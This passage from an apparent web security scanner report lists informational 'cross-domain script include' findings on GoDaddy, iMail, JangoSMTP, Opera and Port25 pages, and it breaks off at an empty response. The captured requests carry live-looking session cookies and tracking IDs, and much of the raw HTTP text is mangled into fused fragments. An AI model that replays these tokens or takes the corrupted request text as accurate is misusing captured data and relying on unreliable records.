HTTP/1.1 200 OKrceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:08:28 GMT; path=/&referrer=&sitename=www.godaddy.com&page=/domains/search.aspx&server=M1PWCORPWEB181&status=200 OK&querystring=&shopper=46215684&privatelabelid=1&isc=71bf3%0d%0&clientip=50.23.123.106&referringpath=fb691c64-72f6-4f9a-b525-0b2548cfab03&referringdomain=&split=95; domain=godaddy.com; path=/=jauafgggzbdbdhedqdvejhcgpjbacdnd; domain=godaddy.com; path=//xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... :0;"><script src="http://img3.wsimg.com/AtlantisScripts/jquery/jquery-1.3.2.min.js" type="text/javascript"> </script>...[SNIP]... <script type="text/javascript" language="javascript" src="http://img3.wsimg.com/pc/js/1/gd_js_20110817.min.js"> </script>...[SNIP]... <script src="http://img3.wsimg.com/fastball/js_lib/FastballLibrary0006.js?version=2" type="text/javascript"> </script><script src="http://img3.wsimg.com/fos/script/sales16.min.js" type="text/javascript"> </script>...[SNIP]... <script src="http://img3.wsimg.com/fos/script/atlantis_jquery8.js" type="text/javascript"> </script>...[SNIP]...
16.43. http://www.godaddy.com/gdshop/site_search.asp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.godaddy.com
Path:
/gdshop/site_search.asp
Issue detail
The response dynamically includes the following scripts from other domains:http://imagesak.securepaynet.net/AtlantisScripts/jquery/jquery-1.3.1.min.js http://img3.wsimg.com/pc/js/1/gd_js_20110817.min.js
Request
POST /gdshop/site_search.asp?ci=9104&pageNum=1&searchFor=xss HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7=vb1jphe2sxzvygvmo3bblx55; preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; adc1=US; SplitValue1=19; HPBackground=DanicaImageOne; currency1=potableSourceStr=USD; flag1=cflag=us; currencypopin1=cdisplaypopin=false; traffic=; pathway=2a590ae0-0ee8-47bd-8061-af016da64611; pagecount=1; actioncount=; app_pathway=; visitor=vid=2a590ae0-0ee8-47bd-8061-af016da64611; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1-urlencoded
Response
HTTP/1.1 200 OKORPWEB181&sitename=www%2Egodaddy%2Ecom&cookies=1&clientip=50%2E23%2E123%2E106&status=200+OK&referrer=http%3A%2F%2Fwww%2Egodaddy%2Ecom%2F&isc=&privatelabelid=1&page=%2Fgdshop%2Fsite%5Fsearch%2Easp&referringdomain=&referringpath=2a590ae0%2D0ee8%2D47bd%2D8061%2Daf016da64611&shopper=46215684&querystring=ci%3D9104%26pageNum%3D1%26searchFor%3Dxss; domain=.godaddy.com; path=//xhtml1/DTD/xhtml1-transitional.dtd"><html>...[SNIP]... <script src="http://imagesak.securepaynet.net/AtlantisScripts/jquery/jquery-1.3.1.min.js" type="text/javascript"> </script>...[SNIP]... <script type="text/javascript" language="javascript" src="http://img3.wsimg.com/pc/js/1/gd_js_20110817.min.js"> </script>...[SNIP]...
16.44. http://www.godaddy.com/offers/hot-deals2.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.godaddy.com
Path:
/offers/hot-deals2.aspx
Issue detail
The response dynamically includes the following scripts from other domains:http://img3.wsimg.com/AtlantisScripts/jquery/jquery-1.5.1.min.js http://img3.wsimg.com/fastball/js_lib/FastballLibrary0006.js?version=2 http://img3.wsimg.com/fos/script/atlantis_jquery9.min.js http://img3.wsimg.com/fos/script/sales16.min.js http://img3.wsimg.com/pc/js/1/gd_js_20110817.min.js
Request
GET /offers/hot-deals2.aspx?ci=51455 HTTP/1.1/domains/search.aspx/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3laypopin=false; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; flag1=cflag=us; ASP.NET_SessionId=kwd42kibl1s4hu55omguef55; preferences1=_sid=uddglhvacbaaxcsewbpfbfkhsgjjfjxe&gdshop_currencyType=USD&dataCenterCode=US; SplitValue1=95; pathway=b60669da-2123-4bfc-afe4-9bcdeba931e5; HPBackground=DanicaImageTwo; ShopperId1=sbravgnfjbbhqgwfvetdgajdqbqdniza; BlueLithium_domainsearch=obsjsdjcfihcwgzeliqdtiigagkahckc; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=2; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; traffic=cookies=1&referrer=http://www.godaddy.com/domains/search.aspx&sitename=www.godaddy.com&page=/Domains/Controls/JsonContent/generalPricing.aspx&server=M1PWCORPWEB181&status=200 OK&querystring=TargetDivID=general_pricing_json_content&_=1316214561887&shopper=46215684&privatelabelid=1&isc=&clientip=50.23.123.106&referringpath=b60669da-2123-4bfc-afe4-9bcdeba931e5&referringdomain=&split=95; currency1=potableSourceStr=USD; adc1=US
Response
HTTP/1.1 200 OKrceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:08:35 GMT; path=/&referrer=http://www.godaddy.com/domains/search.aspx&sitename=www.godaddy.com&page=/offers/hot-deals2.aspx&server=M1PWCORPWEB181&status=200 OK&querystring=ci=51455&shopper=46215684&privatelabelid=1&isc=d0d8de1c80&clientip=50.23.123.106&referringpath=b60669da-2123-4bfc-afe4-9bcdeba931e5&referringdomain=&split=95; domain=godaddy.com; path=//xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... :0;"><script src="http://img3.wsimg.com/AtlantisScripts/jquery/jquery-1.5.1.min.js" type="text/javascript"> </script>...[SNIP]... <script type="text/javascript" language="javascript" src="http://img3.wsimg.com/pc/js/1/gd_js_20110817.min.js"> </script>...[SNIP]... <script src="http://img3.wsimg.com/fastball/js_lib/FastballLibrary0006.js?version=2" type="text/javascript"> </script><script src="http://img3.wsimg.com/fos/script/sales16.min.js" type="text/javascript"> </script><script src="http://img3.wsimg.com/fos/script/atlantis_jquery9.min.js" type="text/javascript"> </script>...[SNIP]...
16.45. http://www.godaddy.com/productadvisor/pastart.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.godaddy.com
Path:
/productadvisor/pastart.aspx
Issue detail
The response dynamically includes the following scripts from other domains:http://img3.wsimg.com/AtlantisScripts/jquery/jquery-1.3.2.min.js http://img3.wsimg.com/fastball/js_lib/FastballLibrary0006.js?version=2 http://img3.wsimg.com/fos/script/ProductAdvisor5.min.js http://img3.wsimg.com/fos/script/sales16.min.js http://img3.wsimg.com/pc/js/1/gd_js_20110817.min.js
Request
GET /productadvisor/pastart.aspx?ci=13108 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7/gdshop/site_search.asp?ci=9104&pageNum=1&searchFor=xss=vb1jphe2sxzvygvmo3bblx55; preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; adc1=US; SplitValue1=19; HPBackground=DanicaImageOne; currency1=potableSourceStr=USD; flag1=cflag=us; currencypopin1=cdisplaypopin=false; traffic=; pathway=2a590ae0-0ee8-47bd-8061-af016da64611; pagecount=2; actioncount=; app_pathway=; visitor=vid=2a590ae0-0ee8-47bd-8061-af016da64611; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMinorVer=0&fMajorVer=0&slMajorVer=-1&slMinorVer=-1; domainYardVal=%2D1; serverVersion=A; ASPSESSIONIDQCRSARQR=BGAMBCHBECAECHGCHMMADCKA
Response
HTTP/1.1 200 OKrceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:07:38 GMT; path=/&referrer=http://www.godaddy.com/gdshop/site_search.asp?ci=9104&pageNum=1&searchFor=xss&sitename=www.godaddy.com&page=/productadvisor/pastart.aspx&server=M1PWCORPWEB181&status=200 OK&querystring=ci=13108&shopper=46215684&privatelabelid=1&isc=&clientip=50.23.123.106&referringpath=2a590ae0-0ee8-47bd-8061-af016da64611&referringdomain=&split=19; domain=godaddy.com; path=//xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... :0;"><script src="http://img3.wsimg.com/AtlantisScripts/jquery/jquery-1.3.2.min.js" type="text/javascript"> </script>...[SNIP]... %3a%2f%2fwww.godaddy.com%2fgdshop%2fsite_search.asp%3fci%3d9104%26pageNum%3d1%26searchFor%3dxss&ci=13108&split=19&querystring=ci%3d13108" alt="" class="traffic" /><script src="http://img3.wsimg.com/fos/script/ProductAdvisor5.min.js" type="text/javascript"> </script>...[SNIP]... <script type="text/javascript" language="javascript" src="http://img3.wsimg.com/pc/js/1/gd_js_20110817.min.js"> </script>...[SNIP]... <script src="http://img3.wsimg.com/fastball/js_lib/FastballLibrary0006.js?version=2" type="text/javascript"> </script><script src="http://img3.wsimg.com/fos/script/sales16.min.js" type="text/javascript"> </script>...[SNIP]...
16.46. http://www.imailserver.com/products/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.imailserver.com
Path:
/products/
Issue detail
The response dynamically includes the following script from another domain:http://s7.addthis.com/js/250/addthis_widget.js
Request
GET /products/ HTTP/1.1.com/resources/find-a-reseller//xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3E807960C41FF98EEDD6EB4DB9CA7EA3FFDFD640; __utma=215877519.1126109822.1316204852.1316204852.1316204852.1; __utmb=215877519.4.10.1316204852; __utmc=215877519; __utmz=215877519.1316204852.1.1.utmgclid=cpnitvmjoqscfqhrgwodlzugzg|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=smtp%20server
Response
HTTP/1.1 200 OK.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml" dir="ltr" lang="en-US" xml:lang="en...[SNIP]... <script type="text/javascript" src="//s7.addthis.com/js/250/addthis_widget.js#pubid=wp-4e736c1b5ae5ecbd"> </script>...[SNIP]...
16.47. http://www.imailserver.com/products/imail-secure-server/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.imailserver.com
Path:
/products/imail-secure-server/
Issue detail
The response dynamically includes the following script from another domain:http://s7.addthis.com/js/250/addthis_widget.js
Request
GET /products/imail-secure-server/ HTTP/1.1.com/products//xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3E807960C41FF98EEDD6EB4DB9CA7EA3FFDFD640; __utma=215877519.1126109822.1316204852.1316204852.1316204852.1; __utmb=215877519.5.10.1316204852; __utmc=215877519; __utmz=215877519.1316204852.1.1.utmgclid=cpnitvmjoqscfqhrgwodlzugzg|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=smtp%20server
Response
HTTP/1.1 200 OK.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml" dir="ltr" lang="en-US" xml:lang="en...[SNIP]... <script type="text/javascript" src="//s7.addthis.com/js/250/addthis_widget.js#pubid=wp-4e736c1f4bf8c888"> </script>...[SNIP]...
16.48. http://www.imailserver.com/resources/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.imailserver.com
Path:
/resources/
Issue detail
The response dynamically includes the following script from another domain:http://s7.addthis.com/js/250/addthis_widget.js
Request
GET /resources/ HTTP/1.1.com/windows-email-server/?k_id=imailserver_com_imail_internetmarketing_worldwide_googleadwords&gclid=cpnitvmjoqscfqhrgwodlzugzg/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3E807960C41FF98EEDD6EB4DB9CA7EA3FFDFD640; __utma=215877519.1126109822.1316204852.1316204852.1316204852.1; __utmb=215877519.1.10.1316204852; __utmc=215877519; __utmz=215877519.1316204852.1.1.utmgclid=cpnitvmjoqscfqhrgwodlzugzg|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=smtp%20server
Response
HTTP/1.1 200 OK.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml" dir="ltr" lang="en-US" xml:lang="en...[SNIP]... <script type="text/javascript" src="//s7.addthis.com/js/250/addthis_widget.js#pubid=wp-4e736b0e21b420c1"> </script>...[SNIP]...
16.49. http://www.imailserver.com/resources/find-a-reseller/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.imailserver.com
Path:
/resources/find-a-reseller/
Issue detail
The response dynamically includes the following script from another domain:http://s7.addthis.com/js/250/addthis_widget.js
Request
GET /resources/find-a-reseller/ HTTP/1.1.com/resources/testimonials//xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3E807960C41FF98EEDD6EB4DB9CA7EA3FFDFD640; __utma=215877519.1126109822.1316204852.1316204852.1316204852.1; __utmb=215877519.3.10.1316204852; __utmc=215877519; __utmz=215877519.1316204852.1.1.utmgclid=cpnitvmjoqscfqhrgwodlzugzg|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=smtp%20server
Response
HTTP/1.1 200 OK.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml" dir="ltr" lang="en-US" xml:lang="en...[SNIP]... <script type="text/javascript" src="//s7.addthis.com/js/250/addthis_widget.js#pubid=wp-4e736c193d3e3cdd"> </script>...[SNIP]...
16.50. http://www.imailserver.com/resources/testimonials/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.imailserver.com
Path:
/resources/testimonials/
Issue detail
The response dynamically includes the following script from another domain:http://s7.addthis.com/js/250/addthis_widget.js
Request
GET /resources/testimonials/ HTTP/1.1.com/resources//xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3E807960C41FF98EEDD6EB4DB9CA7EA3FFDFD640; __utma=215877519.1126109822.1316204852.1316204852.1316204852.1; __utmb=215877519.2.10.1316204852; __utmc=215877519; __utmz=215877519.1316204852.1.1.utmgclid=cpnitvmjoqscfqhrgwodlzugzg|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=smtp%20server
Response
HTTP/1.1 200 OK.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml" dir="ltr" lang="en-US" xml:lang="en...[SNIP]... <script type="text/javascript" src="//s7.addthis.com/js/250/addthis_widget.js#pubid=wp-4e736b746765c691"> </script>...[SNIP]...
16.51. http://www.imailserver.com/support/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.imailserver.com
Path:
/support/
Issue detail
The response dynamically includes the following script from another domain:http://s7.addthis.com/js/250/addthis_widget.js
Request
GET /support/ HTTP/1.1.com/products/imail-secure-server//xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3E807960C41FF98EEDD6EB4DB9CA7EA3FFDFD640; __utma=215877519.1126109822.1316204852.1316204852.1316204852.1; __utmb=215877519.6.10.1316204852; __utmc=215877519; __utmz=215877519.1316204852.1.1.utmgclid=cpnitvmjoqscfqhrgwodlzugzg|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=smtp%20server
Response
HTTP/1.1 200 OK.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml" dir="ltr" lang="en-US" xml:lang="en...[SNIP]... <script type="text/javascript" src="//s7.addthis.com/js/250/addthis_widget.js#pubid=wp-4e736c271378e92c"> </script>...[SNIP]...
16.52. http://www.imailserver.com/windows-email-server/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.imailserver.com
Path:
/windows-email-server/
Issue detail
The response dynamically includes the following script from another domain:http://s7.addthis.com/js/250/addthis_widget.js
Request
GET /windows-email-server/?k_id=imailserver_com_imail_internetmarketing_worldwide_googleadwords&gclid=cpnitvmjoqscfqhrgwodlzugzg HTTP/1.1/search?sourceid=chrome&ie=UTF-8&q=smtp+server/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml" dir="ltr" lang="en-US" xml:lang="en...[SNIP]... <script type="text/javascript" src="//s7.addthis.com/js/250/addthis_widget.js#pubid=wp-4e736abb459699c9"> </script>...[SNIP]...
16.53. http://www.jangosmtp.com/Free-Account.asp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.jangosmtp.com
Path:
/Free-Account.asp
Issue detail
The response dynamically includes the following script from another domain:http://www.googleadservices.com/pagead/conversion.js
Request
GET /Free-Account.asp?s=g&kw=SMTP%20server&gclid=CKGSi_aJoqsCFRdTgwod5zgZiw HTTP/1.1/search?sourceid=chrome&ie=UTF-8&q=smtp+server/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK+server&Search=g&Referrer=http%3A%2F%2Fwww%2Egoogle%2Ecom%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF%2D8%26q%3Dsmtp%2Bserver; expires=Fri, 16-Dec-2011 16:26:44 GMT; path=//xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"> ...[SNIP]...
16.54. http://www.jangosmtp.com/Pricing.asp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.jangosmtp.com
Path:
/Pricing.asp
Issue detail
The response dynamically includes the following script from another domain:http://www.googleadservices.com/pagead/conversion.js
Request
GET /Pricing.asp HTTP/1.1/default.asp/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3+server&Referrer=http%3A%2F%2Fwww%2Egoogle%2Ecom%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF%2D8%26q%3Dsmtp%2Bserver&Search=g; ASPSESSIONIDSCTSBTQQ=PLBPJOABDACEOGJJFNFHKHNJ; __utma=213119631.1093174196.1316204842.1316204842.1316204842.1; __utmb=213119631.2.10.1316204842; __utmc=213119631; __utmz=213119631.1316204842.1.1.utmgclid=CKGSi_aJoqsCFRdTgwod5zgZiw|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=smtp%20server; _chartbeat2=vs5g6yeo9lxk52er.1316204846394
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"> ...[SNIP]...
16.55. http://www.jangosmtp.com/default.asp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.jangosmtp.com
Path:
/default.asp
Issue detail
The response dynamically includes the following script from another domain:http://www.googleadservices.com/pagead/conversion.js
Request
GET /default.asp HTTP/1.1/Free-Account.asp?s=g&kw=SMTP%20server&gclid=CKGSi_aJoqsCFRdTgwod5zgZiw/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3+server&Referrer=http%3A%2F%2Fwww%2Egoogle%2Ecom%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF%2D8%26q%3Dsmtp%2Bserver&Search=g; ASPSESSIONIDSCTSBTQQ=PLBPJOABDACEOGJJFNFHKHNJ; __utma=213119631.1093174196.1316204842.1316204842.1316204842.1; __utmb=213119631.1.10.1316204842; __utmc=213119631; __utmz=213119631.1316204842.1.1.utmgclid=CKGSi_aJoqsCFRdTgwod5zgZiw|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=smtp%20server; _chartbeat2=vs5g6yeo9lxk52er.1316204846394
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"> ...[SNIP]...
16.56. http://www.jangosmtp.com/login.asp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.jangosmtp.com
Path:
/login.asp
Issue detail
The response dynamically includes the following script from another domain:http://www.googleadservices.com/pagead/conversion.js
Request
GET /login.asp HTTP/1.1/Free-Account-Action.asp/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3+server&Referrer=http%3A%2F%2Fwww%2Egoogle%2Ecom%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF%2D8%26q%3Dsmtp%2Bserver&Search=g; ASPSESSIONIDSCTSBTQQ=PLBPJOABDACEOGJJFNFHKHNJ; __utma=213119631.1093174196.1316204842.1316204842.1316204842.1; __utmb=213119631.4.10.1316204842; __utmc=213119631; __utmz=213119631.1316204842.1.1.utmgclid=CKGSi_aJoqsCFRdTgwod5zgZiw|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=smtp%20server; _chartbeat2=vs5g6yeo9lxk52er.1316204846394
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"> ...[SNIP]...
16.57. https://www.jangosmtp.com/PasswordReset.asp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.jangosmtp.com
Path:
/PasswordReset.asp
Issue detail
The response dynamically includes the following script from another domain:http://www.googleadservices.com/pagead/conversion.js
Request
GET /PasswordReset.asp HTTP/1.1/login.asp?status=failed/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3=PLBPJOABDACEOGJJFNFHKHNJ; __utma=213119631.1093174196.1316204842.1316204842.1316204842.1; __utmb=213119631.5.10.1316204842; __utmc=213119631; __utmz=213119631.1316204842.1.1.utmgclid=CKGSi_aJoqsCFRdTgwod5zgZiw|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=smtp%20server; _chartbeat2=vs5g6yeo9lxk52er.1316204846394; ASPSESSIONIDSCTWBTQQ=DJNPJOABFNFKEADPKMALIIHA; JangoMail=Referrer=http%3A%2F%2Fwww%2Ejangosmtp%2Ecom%2Flogin%2Easp&Search=g&Word=SMTP+server
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"> ...[SNIP]...
16.58. https://www.jangosmtp.com/login.asp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.jangosmtp.com
Path:
/login.asp
Issue detail
The response dynamically includes the following script from another domain:http://www.googleadservices.com/pagead/conversion.js
Request
GET /login.asp?status=failed HTTP/1.1/login.asp/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3+server&Referrer=http%3A%2F%2Fwww%2Egoogle%2Ecom%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF%2D8%26q%3Dsmtp%2Bserver&Search=g; ASPSESSIONIDSCTSBTQQ=PLBPJOABDACEOGJJFNFHKHNJ; __utma=213119631.1093174196.1316204842.1316204842.1316204842.1; __utmb=213119631.5.10.1316204842; __utmc=213119631; __utmz=213119631.1316204842.1.1.utmgclid=CKGSi_aJoqsCFRdTgwod5zgZiw|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=smtp%20server; _chartbeat2=vs5g6yeo9lxk52er.1316204846394; ASPSESSIONIDSCTWBTQQ=DJNPJOABFNFKEADPKMALIIHA
Response
HTTP/1.1 200 OK+server&Referrer=http%3A%2F%2Fwww%2Ejangosmtp%2Ecom%2Flogin%2Easp&Search=g; expires=Fri, 16-Dec-2011 16:30:42 GMT; path=//xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"> ...[SNIP]...
16.59. http://www.opera.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.opera.com
Path:
/
Issue detail
The response dynamically includes the following scripts from other domains:http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js http://www.googleadservices.com/pagead/conversion.js
Request
GET /?ref=home HTTP/1.1/application/192//xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" lang="en" xml:lang="en">...[SNIP]... <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"> </script>...[SNIP]... <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"> </script>...[SNIP]...
16.60. http://www.opera.com/company/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.opera.com
Path:
/company/
Issue detail
The response dynamically includes the following script from another domain:http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
Request
GET /company/ HTTP/1.1/addons/extensions//xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3.1534674535.1316207960.1316207960.1316207960.1; __utmb=122269525.2.10.1316207960; __utmc=122269525; __utmz=122269525.1316207960.1.1.utmcsr=unite.opera.com|utmccn=(referral)|utmcmd=referral|utmcct=/application/192/
Response
HTTP/1.1 200 OK750cb3d3f1fbeb1;domain=.www.opera.com;path=/;/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" lang="en" id="company-hd" xml:lang="en">...[SNIP]... <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"> </script>...[SNIP]...
16.61. http://www.port25.com/products/prod_eval.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.port25.com
Path:
/products/prod_eval.html
Issue detail
The response dynamically includes the following script from another domain:http://www.conversionruler.com/bin/clienttrack1.php
Request
GET /products/prod_eval.html HTTP/1.1/products/prod_pmta4_features.html/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3BCFD6E; __utma=1.5711670.1316204852.1316204852.1316204852.1; __utmb=1.5.10.1316204852; __utmc=1; __utmz=1.1316204852.1.1.utmgclid=CL3QyvqJoqsCFSOAgwodRgln2A|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=smtp%20server; __ar_v4=NQ5TTRI2MVGQHFZLQL6SMW%3A20110916%3A2%7CUSFQSVPCUNEC3MWWKVX6RH%3A20110916%3A2%7C4LZ2WHLFKZGJBDJQYVBYXX%3A20110916%3A2
Response
HTTP/1.1 200 OK031cc0".dwt" --><!-- DW6 -->...[SNIP]... <script language="JavaScript" type="text/javascript" src="http://www.conversionruler.com/bin/clienttrack1.php"> </script>...[SNIP]...
16.62. http://www.port25.com/products/prod_evalthanks.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.port25.com
Path:
/products/prod_evalthanks.html
Issue detail
The response dynamically includes the following script from another domain:http://www.googleadservices.com/pagead/conversion.js
Request
GET /products/prod_evalthanks.html HTTP/1.1/products/prod_eval.html/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3BCFD6E; CR_1195_3=3A753701A31A2BFD; __utma=1.5711670.1316204852.1316204852.1316204852.1; __utmb=1.6.10.1316204852; __utmc=1; __utmz=1.1316204852.1.1.utmgclid=CL3QyvqJoqsCFSOAgwodRgln2A|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=smtp%20server; __ar_v4=4LZ2WHLFKZGJBDJQYVBYXX%3A20110916%3A2%7CUSFQSVPCUNEC3MWWKVX6RH%3A20110916%3A2%7CNQ5TTRI2MVGQHFZLQL6SMW%3A20110916%3A2
Response
HTTP/1.1 200 OK031cc0".dwt" --><!-- DW6 -->...[SNIP]... <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"> ...[SNIP]...
16.63. http://www.port25.com/products/prod_pmta4_features.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.port25.com
Path:
/products/prod_pmta4_features.html
Issue detail
The response dynamically includes the following script from another domain:http://www.conversionruler.com/bin/clienttrack1.php
Request
GET /products/prod_pmta4_features.html HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3.1316204852.1316204852.1316204852.1; __utmb=1.4.10.1316204852; __utmc=1; __utmz=1.1316204852.1.1.utmgclid=CL3QyvqJoqsCFSOAgwodRgln2A|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=smtp%20server; __ar_v4=%7C4LZ2WHLFKZGJBDJQYVBYXX%3A20110916%3A1%7CUSFQSVPCUNEC3MWWKVX6RH%3A20110916%3A1%7CNQ5TTRI2MVGQHFZLQL6SMW%3A20110916%3A1
Response
HTTP/1.1 200 OK125f00".dwt" --><!-- DW6 -->...[SNIP]... <script language="JavaScript" type="text/javascript" src="http://www.conversionruler.com/bin/clienttrack1.php"> </script>...[SNIP]...
16.64. http://www.powermta.port25.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.powermta.port25.com
Path:
/
Issue detail
The response dynamically includes the following scripts from other domains:http://connect.facebook.net/en_US/all.js http://platform.twitter.com/widgets.js http://powermta1.com/wp-content/plugins/cforms/js/cforms.js
Request
GET / HTTP/1.1.port25.com/download-a-white-paper//xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.38440b2cc83a3d5c03dcf8c; __ar_v4=%7C4LZ2WHLFKZGJBDJQYVBYXX%3A20110916%3A1%7CUSFQSVPCUNEC3MWWKVX6RH%3A20110916%3A1%7CNQ5TTRI2MVGQHFZLQL6SMW%3A20110916%3A1; __utma=1.5711670.1316204852.1316204852.1316204852.1; __utmb=1.2.10.1316204852; __utmc=1; __utmz=1.1316204852.1.1.utmgclid=CL3QyvqJoqsCFSOAgwodRgln2A|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=smtp%20server
Response
